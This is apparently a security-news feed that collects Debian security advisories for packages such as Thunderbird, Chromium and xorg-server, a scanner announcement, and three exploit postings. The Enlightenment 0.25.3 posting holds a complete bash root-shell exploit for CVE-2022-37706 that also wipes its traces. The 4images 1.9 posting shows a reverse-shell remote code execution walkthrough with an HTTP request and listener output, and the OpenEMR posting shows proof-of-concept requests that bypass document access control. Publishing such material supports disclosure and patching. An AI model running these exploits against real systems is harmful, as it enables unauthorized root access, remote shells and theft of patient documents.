Debian Linux Security Advisory 5307-1 - ZeddYu Lu discovered that the FTP client of Apache Commons Net, a Java client API for basic Internet protocols, trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5307-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyDecember 29, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libcommons-net-javaCVE ID         : CVE-2021-37533Debian Bug     : 1025910ZeddYu Lu discovered that the FTP client of Apache Commons Net, a Javaclient API for basic Internet protocols, trusts the host from PASV responseby default. A malicious server can redirect the Commons Net code to use adifferent host, but the user has to connect to the malicious server in thefirst place. This may lead to leakage of information about services runningon the private network of the client.For the stable distribution (bullseye), this problem has been fixed inversion 3.6-1+deb11u1.We recommend that you upgrade your libcommons-net-java packages.For the detailed security status of libcommons-net-java please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libcommons-net-javaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmOuAhxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeQFMRAAkfJnlIJiqMGM3fpQVVimQHPeevcHiMtm3MFF6A8Ljw6Triwh6eRJ5zyrbhxGQyERVP2HO/mxUJAqoNmle3pcbRD3qVk4WbqOZyoC9aMthLSYoOR46t2zg2A9ZRKdcq721scBYtDiXovwRl9/TnFbyZC7X3Hzy2Coe0INc49k/LfMBJhZs4Ibc6i3V3RdK5aIYYBAYA9Y13kZMnctoXp/7ie32BAz2DvyHTXBNCXW4nH1MD8Q/V9Dp+AOg0reOSTzfK5CPP4Ed2LbDmJiVei64I1FQf/gAjFBMDRrPdJUbMWfqnuRvTMgx7BDy5GJkq9wH65sfLJmNpdHn/vB4rTsmx4LOL4EKHRBz2rr+Tz2oki5BNSCkF47rDeKGRQFNr7NmIF7qapIBPIr1eyhM3isLZLbJmEgPNIKFYSHPW+JDyixmPRmi8tzDMPNCWpl/5Wj1Qlfk1Vtva014y7SldvOn4tBqF1KYf2mSx+Kl8lBJPQ4LEQUYoWChBcHJ2GrL2Ur7loMStzAOSaieOHakwQ+Zlm0WghxfIIAuE+UyOaZkuJmwPKZex2xRRr4b2bOrnjrRs+9OmNF3xwAlzO0/f8LiWJCoQ/4u9uoEqSF2buyIA7YsdcgNSYJLyAR4uihJtSFSr9CPREgo+dnF9CCH1M7GBq7zXRp4Bim6FKIchoa9FI=sUOH-----END PGP SIGNATURE-----

Debian Security Advisory 5307-1

Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]

Scanvus now supports Vulners and Vulns.io VM Linux vulnerability detection APIs

Debian Linux Security Advisory 5306-1 - Several vulnerabilities were discovered in gerbv, a Gerber file viewer, which could result in the execution of arbitrary code, denial of service or information disclosure if a specially crafted file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5306-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 27, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gerbvCVE ID         : CVE-2021-40393 CVE-2021-40394 CVE-2021-40401 CVE-2021-40403Several vulnerabilities were discovered in gerbv, a Gerber file viewer,which could result in the execution of arbitrary code, denial of serviceor information disclosure if a specially crafted file is processed.For the stable distribution (bullseye), these problems have been fixed inversion 2.7.0-2+deb11u2.We recommend that you upgrade your gerbv packages.For the detailed security status of gerbv please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/gerbvFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOq/ExfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Qbzw/9HJCEspk5wEzreH6CJZb1NQdGHFg4WupQnTss3bOhJF9bw6RJegaGNZB+XhJ3b6924dwu5yI/WfFn7lcNSvNlZ2gRE/VqOeWtBTrwI0+xGbKX/dN/qve98sXDgsbQPFi16Vky/5IWMvu9zYAlHAeyjeS1uCVPartlEdQZOzMQ360GDvY/GJ9X8bKldQ1+LtV5qxph97sYuADttNdCY+Qeuu5bvsgXZiKHUX3Fa5v7855APS12w8kRbvaHe9mAhokQ3AXWyZguvBUIEDuHxRR2OeLH5wXQDe5/R/AHiUrkghxmWX2k1APhP7BS7gfVgNy7yhnZVPLmd85yKSOndiIy3v8rUg8KPmSN7lTKMJDLdlneNHa+vesKN9UgB431fvT6z6s3ZOOTIKE9X/G/m11m54QbC0TyXDkL0lFzCC+JHcKxrRK7PxPcJ5Wmyt7/tW3tYHGMNYF30IEqvETXONMh1H4Adg5M5leuXK3j1dotUBtGprAGAZKuc164zNzejkoRfhtOOU5244AU+qWrc803jWhHcPX/a3+STt/IVAykUIw1lxsskNpQx+JnzyBnU85KNZtyB99kkrbjPfhX5vImv4iBrN0hEmnnbQHM22YilTN1BMZJAbEKyD6jtSvyKwotRXD6TEpYIe7fMPz5rwxg1by4LpBlE3x3gvbjN6zFO8I=yc9S-----END PGP SIGNATURE-----

Debian Security Advisory 5306-1

Enlightenment version 0.25.3 suffers from a local privilege escalation vulnerability.

    ## Title: Enlightenment Version: 0.25.3 LPE## Author: nu11secur1ty## Date: 12.26.2022## Vendor: https://www.enlightenment.org/## Software: https://www.enlightenment.org/download## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706## Description:The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.Enlightenment_sys in Enlightenment before 0.25.4 allows local users togain privileges because it is setuid root,and the system library function mishandles pathnames that begin with a/dev/.. substringIf the attacker has access locally to some machine on which themachine is installed Enlightenmenthe can use this vulnerability to do very dangerous stuff.## STATUS: CRITICAL Vulnerability## Tested on:```bashDISTRIB_ID=UbuntuDISTRIB_RELEASE=22.10DISTRIB_CODENAME=kineticDISTRIB_DESCRIPTION="Ubuntu 22.10"PRETTY_NAME="Ubuntu 22.10"NAME="Ubuntu"VERSION_ID="22.10"VERSION="22.10 (Kinetic Kudu)"VERSION_CODENAME=kineticID=ubuntuID_LIKE=debianHOME_URL="https://www.ubuntu.com/"SUPPORT_URL="https://help.ubuntu.com/"BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"UBUNTU_CODENAME=kineticLOGO=ubuntu-logo```[+] Exploit:```bash#!/usr/bin/bash# Idea by MaherAzzouz# Development by nu11secur1tyecho "CVE-2022-37706"echo "[*] Trying to find the vulnerable SUID file..."echo "[*] This may take few seconds..."# The actual problemfile=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)if [[ -z ${file} ]]then  echo "[-] Couldn't find the vulnerable SUID file..."  echo "[*] Enlightenment should be installed on your system."  exit 1fiecho "[+] Vulnerable SUID binary found!"echo "[+] Trying to pop a root shell!"mkdir -p /tmp/netmkdir -p "/dev/../tmp/;/tmp/exploit"echo "/bin/sh" > /tmp/exploitchmod a+x /tmp/exploitecho "[+] Welcome to the rabbit hole :)"${file} /bin/mount -onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),"/dev/../tmp/;/tmp/exploit" /tmp///netread -p "Press any key to clean the evedence..."echo -e "Please wait... "sleep 5rm -rf /tmp/exploitrm -rf /tmp/netecho -e "Done; Everything is clear ;)"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)## Proof and Exploit:[href](https://streamable.com/zflbgg)## Time spent`01:00:00`

Enlightenment 0.25.3 Privilege Escalation

4images version 1.9 suffers from a remote command execution vulnerability.

    # Exploit Title: 4images 1.9 - Remote Command Execution# Exploit Author: Andrey Stoykov# Software Link: https://www.4homepages.de/download-4images# Version: 1.9# Tested on: Ubuntu 20.04To reproduce do the following:1. Login as administrator user2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"3. Select Template "categories.html"4. Paste reverse shell code5. Click "Save Changes"6. Browse to "http://host/4images/categories.php?cat_id=1"// HTTP POST request showing reverse shell payloadPOST /4images/admin/templates.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]// HTTP redirect response to specific templateGET /4images/categories.php?cat_id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]# nc -kvlp 4444listening on [any] 4444 ...connect to [127.0.0.1] from localhost [127.0.0.1] 43032Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATkali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessionkali     pts/1    -                11:58    1:40  24.60s  0.14s sudo suuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off$

4images 1.9 Remote Command Execution

Debian Linux Security Advisory 5305-1 - An integer overflow flaw was discovered in the CRL signature parser in libksba, an X.509 and CMS support library, which could result in denial of service or the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5305-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 21, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libksbaCVE ID         : CVE-2022-47629An integer overflow flaw was discovered in the CRL signature parser inlibksba, an X.509 and CMS support library, which could result in denialof service or the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 1.5.0-3+deb11u2.We recommend that you upgrade your libksba packages.For the detailed security status of libksba please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/libksbaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOjfbNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TZeA/+NmgALkjZhrkd2BixzJp2eAe5ocLW5B0g9lB93NIyUORM2A3CgX0MsF+UbYrehbBdQosJOMko5E4St7ETC6H4eVknHj+snuP0j0MY/KQspoTTZfE/28y28734oXiBTuaOmEItHWlpuvreTPOzeNaWck/osiSLaBIWCKooGDnpUrTYAV+AQ7l8pyBU7iaZfOV1hR+ndTYdp/JK1Rl0FgPazCe4UQP1EAhMOE8XqVNKZ/MSh2U5JaSPUzTt+sgJWunB9ysBHbSuKFJ1cli7nqFf8urDmKYYU4gZtKFl4AJV0Oe39UTxjOwQkVhz8buLUVwLtXfSxu8jBTQXGLuwQJrr9W1S5mny3wxMgOOqNozdyoFuYNoIFY4+84dTG4H+L0sWbFCWVHY8gCKwPSa6ZK0eP4UQ9dxgmUfK5K6Ldo8gi0iX1v1Ub3OYz7JzeIfkUKTx82yLmFcFisQNgeXe6lMN+Tzu7WTs3w8Y3OA7a65nKb79PDJFZ/Hiw+p06L+C7SkhfcItMbKwqU3IdfsVrGxTK4VbdYZEoMv0+43zBypLDUF+eVC4E3MJSB0k+qAiyLzr6qbaVZp4m04/B2puqnBACIIc3Vm9BUKQCWYx4R6C8rqfxtOfD2Xmz4xGcNZfr342Kig4QNbkc1zatx72maEX1KGt2x9BmqtSvebuw/EwkBQ=9jlL-----END PGP SIGNATURE-----

Debian Security Advisory 5305-1

Debian Linux Security Advisory 5304-1 - Jan-Niklas Sohn discovered several vulnerabilities in X server extensions in the X.Org X server, which may result in privilege escalation if the X server is running privileged.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5304-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 20, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : xorg-server  
CVE ID         : CVE-2022-4283 CVE-2022-46340 CVE-2022-46341 CVE-2022-46342  
                 CVE-2022-46343 CVE-2022-46344  
Debian Bug     : 1026071

Jan-Niklas Sohn discovered several vulnerabilities in X server extensions  
in the X.Org X server, which may result in privilege escalation if the X  
server is running privileged.

For the stable distribution (bullseye), these problems have been fixed in  
version 2:1.20.11-1+deb11u4.

We recommend that you upgrade your xorg-server packages.

For the detailed security status of xorg-server please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/xorg-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOiEgFfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Qysw//b3WxFj6Bvmix6MNP/D/izMHimLJrgWZthnCpgFIQxwpNrho3YexS3dkh  
nfFIv6FKkFHoWvDDkURee2AROshngIgcl0/yrlouV9gaR0ZtVCI//Ku9t5hTatTd  
/fC9AlIq/s9zgeslq8RzDwhcbQQtT4M0aqQbCt5V9pJGPJ5WTWp9l0D/KVkkiIfU  
6CIJn1xvw6Nu/3m9BWG0VrHP83jTVJi6KhGfFAZkYhTsfw/TOfLUN5nZnQFnNvrR  
+XwruR3Zy1ZA5pStWPVuuGQwi0xuhy3weiz92mGUhRsavw4SrJsL54k+gg5Su2lW  
dzgiRVpjERtbLKXSQxin1nMM3LUePxnFvHwmTaC00XUL2YCLuCECl7NDMIncjJiF  
+rYEEUtAvPOjIC4bvt3KUDfj3pf37/YqhEXgauqc0Gm3irAM/gkxypSszEeYaxne  
7THA+DYh3fnrpZA1tGyCzS4gUPLaxsGU/cRej9ES57rKyZY9n/gdO6r6sPybgZIL  
lRGOt2Unl3eIgMkrH2THLg0v/Rume5Gi4demI5GAoxOw4r500jU+X+/BZLd09pyC  
lhtDUFfcaf7J/LyT/EM98M/mAp4iCq4lFuZbCxoGyip/HsaPtWb4EQw9mVzkAByM  
BnwC/La8g0z0n/b/eMNM2hd7BajKH4uobmvfRicyCc5YG3CrE10Èpj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5304-1

Debian Linux Security Advisory 5303-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5303-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2022-46882 CVE-2022-46881 CVE-2022-46880 CVE-2022-46878                 CVE-2022-46874 CVE-2022-46872 CVE-2022-45414Multiple security issues were discovered in Thunderbird, which couldresult in the execution of arbitrary code or information disclosure.For the stable distribution (bullseye), this problem has been fixed inversion 1:102.6.0-1~deb11u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOcwVkACgkQEMKTtsN8TjYhNA//e9mQQto3dcqum+DpkqlxnQ0oJZW90A4qnpdorbSH6AuQodiaMXYrhZ1y7LaCCZd2LgxwIOoW5ukYto7TGGWA+bU8VtdivVKEVJ52dwyzFhp1PMhn81Lr+DRgNf9vYTGO3MYnThKckNhkGPN2qQtxABoBA+opJJIFq7yJW34NEhhWNoH0ubGmCie/13l5msZmN1pYALhsDs1Li7yotVtIRU6r5/t4BUwI0hyfLaR0HDcpeT8iAnyuedMcXF+jFF0B8HQfkakNOc4fODcpiNVW6FAezRPprCTCqpuIr8Ic7yrYWYlAjayLRBbp277JXESFk16Oao/OR0Qf4SpfhDCw3IZwG6A0De4e7nVxunIkjShU9tfzjx5LPeiGqQkXiS2abklARfRUqFeqPFQJbF+CA7lHZiCWm/LXtOjArkIvZ7j1BNcdPmhe/OAJ04zi1j2aKxNxvKAwBK065N1pSn9iS9zvGva7rcenKYnd8kkdExHSnWCCuo79otgKWQ6az/zIdfwY8MU7xxCo04pNnBH+fUAk4sDZGzjfebuqWuUZQ6KK1uo0w6Ji10zriQ2bJ94eYuptBEZttovyjj7SbOAuAB2zpchHT2TlifpgoTmywRNsMceqDNvzbgTCwMEP30TYXOyiunxOs2AgL/6hFAfZ3oTfpxqjuscKCkfi1pwaYjM=YY+h-----END PGP SIGNATURE-----

Debian Security Advisory 5303-1

Debian Linux Security Advisory 5302-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5302-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2022-4436 CVE-2022-4437 CVE-2022-4438 CVE-2022-4439                 CVE-2022-4440Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 108.0.5359.124-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOcwUwACgkQEMKTtsN8TjaEDhAAuNgbC9i9I5soJN7677urAmv/mzR20/hpcEx4WlrS5YlCMBISsolvytNClMnzfVIe8e0akdshGTtGmehUco7gxXRq7Ab+kCDMFgXrPCf+SDXFbECLR/xtrTGuahzPmrDBwz/5O3gOFcJaEhXoLUER1Xm2UX8MgMlV/pfv8UN0keXriJSS/nWVU5sp8UCfafYxa/cNB51k7VmQTEDL56zcE64zZxXmmfNDvNv9/FHiMHZyATZv499nfEVaI0qvLot/trilA2X6/Wn5aFJD7cRk7PWJR6fzMs36Ad4E9Ww5/mDy6ADKORyRhiHbpw+wRCgs253pkDvwExVTwu2BGsXp9ThnVIHRXflN0GaixsDUryA3x0IRCTiWpNU+armowtAS7I31kht91uPhJaaK3DoB/xgqRbNBHeZnl8NqAaf76ODSGAbjcoUxLXrEb+zD9dLbFuDnfapfeqKCDuZAkeBv9k9etvMTuBTb4KjvA/OfhFTYpF8EJ2+o4RTBqf2vNlEWhSLqXY/ehr6LygFnHlBnrR+SQPUfEQywHEMRa+4DqyWtf25mZKkVl1AdhMqXBF6Rsht0UBOUu2M2g4NOtk/1S34EhPeEhZLSh+Z3XhoIj/UfQLcOgMEQCBHuz1S5tXyLqQCwbpi/Pm+lSI99fPooTH5UoJpDj2cGygXfNysjKq0=kfqY-----END PGP SIGNATURE-----

Debian Security Advisory 5302-1

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.2.

**Description**

An authenticated user without document access has the ability to direct access any document in the system by using a url similar to this http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19. The autoincrement identifier was also susceptible of being bruteforced for both patient_id and document_id.

A second instance allowed an authenticated user without document access to upload file to any user repository.

**Proof of Concept**

The first one allows any user to access a document by referencing the patient_id and document_id:

    http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19
    

The second instance affected the upload functionality. The following example illustrates the situation:

    POST /openemr/controller.php?document&upload&patient_id=2&parent_id=1& HTTP/1.1
    Host: REDACTED
    (...snip...)
    Upgrade-Insecure-Requests: 1
    
    -----------------------------247482557730593022112237721191
    Content-Disposition: form-data; name="MAX_FILE_SIZE"
    
    64000000
    -----------------------------247482557730593022112237721191
    Content-Disposition: form-data; name="file[]"; filename="testBAC.txt"
    Content-Type: text/plain
    
    TESTFILE
    -----------------------------247482557730593022112237721191
    Content-Disposition: form-data; name="dicom_folder[]"; filename=""
    Content-Type: application/octet-stream
    
    (...snip...)
    -----------------------------247482557730593022112237721191--
    

The response displayed a message saying Documents Not Authorized, but the file was successfully uploaded:

    REQUEST:
    GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=23&as_file=false HTTP/1.1
    (...snip...)
    
    RESPONSE:
    HTTP/1.1 200 OK
    Date: Fri, 07 Oct 2022 16:07:36 GMT
    Server: Apache/2.4.54 (Debian)
    Expires: 0
    Cache-Control: must-revalidate, post-check=0, pre-check=0
    Pragma: public
    Content-Description: File Transfer
    Content-Transfer-Encoding: binary
    Content-Disposition: inline; filename="testBAC.txt"
    Content-Length: 8
    Connection: close
    Content-Type: text/plain;charset=utf-8
    
    TESTFILE
    

**Impact**

Any user with access to the platform would be able to bypass document access restrictions and download any document related to any user in the system. It was also possible to inject document to any patient that could leverage malicious data used as valid medical data.

**Occurrences**

Tag

#debian